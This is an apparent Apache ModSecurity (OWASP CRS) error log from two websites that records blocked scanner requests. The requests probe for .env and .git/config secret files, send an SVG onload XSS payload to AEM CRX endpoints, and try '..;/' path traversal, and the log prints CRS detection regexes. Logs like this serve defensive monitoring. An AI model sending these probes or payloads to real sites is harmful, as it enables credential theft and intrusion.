[Tue Sep 09 00:28:05.702449 2025] [:error] [pid 2588880] [client 45.139.104.170:58564] [client 45.139.104.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aL9Ydd7b98CW0wpviJnmtAAAAAU"]
[Tue Sep 09 00:28:05.702776 2025] [:error] [pid 2588880] [client 45.139.104.170:58564] [client 45.139.104.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aL9Ydd7b98CW0wpviJnmtAAAAAU"]
[Tue Sep 09 00:28:05.702930 2025] [:error] [pid 2588880] [client 45.139.104.170:58564] [client 45.139.104.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aL9Ydd7b98CW0wpviJnmtAAAAAU"]
[Tue Sep 09 00:42:20.768140 2025] [:error] [pid 2588879] [client 185.165.171.225:64536] [client 185.165.171.225] ModSecurity: Warning. detected XSS using libinjection. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "59"] [id "941100"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: XSS data found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9bzJXP7V_k2NLveJhK_wAAAAg"]
[Tue Sep 09 00:42:20.768231 2025] [:error] [pid 2588879] [client 185.165.171.225:64536] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\"'`;\\\\/0-9=\\\\x0B\\\\x09\\\\x0C\\\\x3B\\\\x2C\\\\x28\\\\x3B]+on[a-zA-Z]+[\\\\s\\\\x0B\\\\x09\\\\x0C\\\\x3B\\\\x2C\\\\x28\\\\x3B]*?=" at ARGS:keymap. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "120"] [id "941120"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9bzJXP7V_k2NLveJhK_wAAAAg"]
[Tue Sep 09 00:42:20.768331 2025] [:error] [pid 2588879] [client 185.165.171.225:64536] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i:(?:<\\\\w[\\\\s\\\\S]*[\\\\s\\\\/]|['\\"](?:[\\\\s\\\\S]*[\\\\s\\\\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange ..." at ARGS:keymap. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "218"] [id "941160"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <svg/onload= found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9bzJXP7V_k2NLveJhK_wAAAAg"]
[Tue Sep 09 00:42:20.768668 2025] [:error] [pid 2588879] [client 185.165.171.225:64536] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9bzJXP7V_k2NLveJhK_wAAAAg"]
[Tue Sep 09 00:42:20.768846 2025] [:error] [pid 2588879] [client 185.165.171.225:64536] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9bzJXP7V_k2NLveJhK_wAAAAg"]
[Tue Sep 09 00:42:22.623059 2025] [php:error] [pid 2589641] [client 185.165.171.225:64598] script '/var/www/magento.test.indacotrentino.com/www/setup/wizard.php' not found or unable to stat
[Tue Sep 09 00:42:33.477036 2025] [:error] [pid 2588879] [client 185.165.171.225:18532] [client 185.165.171.225] ModSecurity: Warning. detected XSS using libinjection. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "59"] [id "941100"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: XSS data found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9b2ZXP7V_k2NLveJhLBAAAAAg"]
[Tue Sep 09 00:42:33.477129 2025] [:error] [pid 2588879] [client 185.165.171.225:18532] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\"'`;\\\\/0-9=\\\\x0B\\\\x09\\\\x0C\\\\x3B\\\\x2C\\\\x28\\\\x3B]+on[a-zA-Z]+[\\\\s\\\\x0B\\\\x09\\\\x0C\\\\x3B\\\\x2C\\\\x28\\\\x3B]*?=" at ARGS:keymap. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "120"] [id "941120"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9b2ZXP7V_k2NLveJhLBAAAAAg"]
[Tue Sep 09 00:42:33.477234 2025] [:error] [pid 2588879] [client 185.165.171.225:18532] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i:(?:<\\\\w[\\\\s\\\\S]*[\\\\s\\\\/]|['\\"](?:[\\\\s\\\\S]*[\\\\s\\\\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange ..." at ARGS:keymap. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "218"] [id "941160"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <svg/onload= found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9b2ZXP7V_k2NLveJhLBAAAAAg"]
[Tue Sep 09 00:42:33.477555 2025] [:error] [pid 2588879] [client 185.165.171.225:18532] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9b2ZXP7V_k2NLveJhLBAAAAAg"]
[Tue Sep 09 00:42:33.477747 2025] [:error] [pid 2588879] [client 185.165.171.225:18532] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "aL9b2ZXP7V_k2NLveJhLBAAAAAg"]
[Tue Sep 09 00:42:34.491407 2025] [:error] [pid 2588882] [client 185.165.171.225:18582] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /content/../crx/packmgr/list.jsp a.css?_dc=1615863080856&_charset_=utf-8&includeversions=true"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/content/..;/crx/packmgr/list.jsp;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\na.css"] [unique_id "aL9b2lgW-T0SMb_35LqqfwAAAAs"], referer: https://economiasolidale.38121.it
[Tue Sep 09 00:42:34.492161 2025] [:error] [pid 2588882] [client 185.165.171.225:18582] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/content/..;/crx/packmgr/list.jsp;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\na.css"] [unique_id "aL9b2lgW-T0SMb_35LqqfwAAAAs"], referer: https://economiasolidale.38121.it
[Tue Sep 09 00:42:34.492327 2025] [:error] [pid 2588882] [client 185.165.171.225:18582] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/content/..;/crx/packmgr/list.jsp;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\n;\\na.css"] [unique_id "aL9b2lgW-T0SMb_35LqqfwAAAAs"], referer: https://economiasolidale.38121.it
[Tue Sep 09 00:42:34.584331 2025] [:error] [pid 2588882] [client 185.165.171.225:18614] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /../content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/..;/content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"] [unique_id "aL9b2lgW-T0SMb_35LqqgAAAAAs"]
[Tue Sep 09 00:42:34.584841 2025] [:error] [pid 2588882] [client 185.165.171.225:18614] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/..;/content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"] [unique_id "aL9b2lgW-T0SMb_35LqqgAAAAAs"]
[Tue Sep 09 00:42:34.585023 2025] [:error] [pid 2588882] [client 185.165.171.225:18614] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/..;/content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"] [unique_id "aL9b2lgW-T0SMb_35LqqgAAAAAs"]
[Tue Sep 09 14:17:07.429844 2025] [:error] [pid 2595947] [client 93.123.109.7:48578] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMAaw70oMAxZgJcIgNA4OgAAAAk"]
[Tue Sep 09 14:17:07.430168 2025] [:error] [pid 2595947] [client 93.123.109.7:48578] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMAaw70oMAxZgJcIgNA4OgAAAAk"]
[Tue Sep 09 14:17:07.430352 2025] [:error] [pid 2595947] [client 93.123.109.7:48578] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMAaw70oMAxZgJcIgNA4OgAAAAk"]
[Tue Sep 09 23:36:21.456000 2025] [:error] [pid 2595947] [client 185.177.72.29:56228] [client 185.177.72.29] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMCd1b0oMAxZgJcIgNA4wQAAAAk"]
[Tue Sep 09 23:36:21.456229 2025] [:error] [pid 2595947] [client 185.177.72.29:56228] [client 185.177.72.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMCd1b0oMAxZgJcIgNA4wQAAAAk"]
[Tue Sep 09 23:36:21.456409 2025] [:error] [pid 2595947] [client 185.177.72.29:56228] [client 185.177.72.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMCd1b0oMAxZgJcIgNA4wQAAAAk"]
[Tue Sep 09 23:36:21.703118 2025] [:error] [pid 2609415] [client 185.177.72.29:56230] [client 185.177.72.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMCd1eVSm74lvbCCXM8tKAAAAAo"]
[Tue Sep 09 23:36:21.703332 2025] [:error] [pid 2609415] [client 185.177.72.29:56230] [client 185.177.72.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMCd1eVSm74lvbCCXM8tKAAAAAo"]
[Tue Sep 09 23:36:21.703494 2025] [:error] [pid 2609415] [client 185.177.72.29:56230] [client 185.177.72.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMCd1eVSm74lvbCCXM8tKAAAAAo"]
[Tue Sep 09 23:36:21.808411 2025] [:error] [pid 2595959] [client 185.177.72.29:56242] [client 185.177.72.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMCd1YcTm9OeRIWYcXyV5wAAAAw"]
[Tue Sep 09 23:36:21.808623 2025] [:error] [pid 2595959] [client 185.177.72.29:56242] [client 185.177.72.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMCd1YcTm9OeRIWYcXyV5wAAAAw"]
[Tue Sep 09 23:36:21.808783 2025] [:error] [pid 2595959] [client 185.177.72.29:56242] [client 185.177.72.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMCd1YcTm9OeRIWYcXyV5wAAAAw"]
[Tue Sep 09 23:36:22.047062 2025] [:error] [pid 2595957] [client 185.177.72.29:44474] [client 185.177.72.29] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aMCd1ppkIWFvmwhorElgjgAAAAs"]
[Tue Sep 09 23:36:22.047292 2025] [:error] [pid 2595957] [client 185.177.72.29:44474] [client 185.177.72.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aMCd1ppkIWFvmwhorElgjgAAAAs"]
[Tue Sep 09 23:36:22.047468 2025] [:error] [pid 2595957] [client 185.177.72.29:44474] [client 185.177.72.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aMCd1ppkIWFvmwhorElgjgAAAAs"]
[Wed Sep 10 02:57:43.155848 2025] [:error] [pid 2612821] [client 93.123.109.7:45322] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aMDNB84XEr2btaDRi2krpwAAAAI"]
